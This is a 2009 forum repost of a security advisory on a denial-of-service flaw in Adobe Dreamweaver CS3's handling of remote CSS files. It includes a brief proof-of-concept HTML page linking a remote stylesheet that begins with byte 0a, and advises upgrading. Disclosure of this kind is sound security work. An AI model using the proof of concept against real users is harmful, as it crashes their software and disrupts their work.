Adobe Dreamweaver CS3 Denial of Service

sla.ckers.org is
ha.ckers sla.cking

How do we crash systems, browsers, or otherwise bring things to a halt, and how do we protect those things?

Go to Topic: Previous•Next

Go to: Forum List•Message List•New Topic•Search•Log In

Adobe Dreamweaver CS3 Denial of Service

Posted by: Ivan

Date: April 23, 2009 09:42AM

|| Security Net Advisory #D.02.20.09.a

Title : Adobe Dreamweaver CS3 Denial of Service
Impact : DoS
Type : From remote
Vendor :
- Url : http://www.adobe.com/

|| Vulnerability

Engine for parsing remote CSS files are vulnerable to DoS attacks. Successful exploatation requires from user to include special .css file from remote web site.

|| POC

--- tmpl01.dwbug.php ---
<html>
<head>
<link href="http://security-net.biz/test.css" rel="stylesheet" type="text/css" />
</head>
<body> </body>
</html>
------------------------------

File test.css must begin with hex value: 0a, for successful exploatation.

|| Solution:

Upgrade to newest version.

|| Contact

Author : Ivan Markovic, Network Security Solutions
Original advisory: http://security-net.biz/wsw/index.php?p=259&n=190

http://www.security-net.biz/

Options: Reply•Quote

Go to: Forum List•Message List•Search•Log In

Sorry, only registered users may post in this forum.

Click here to login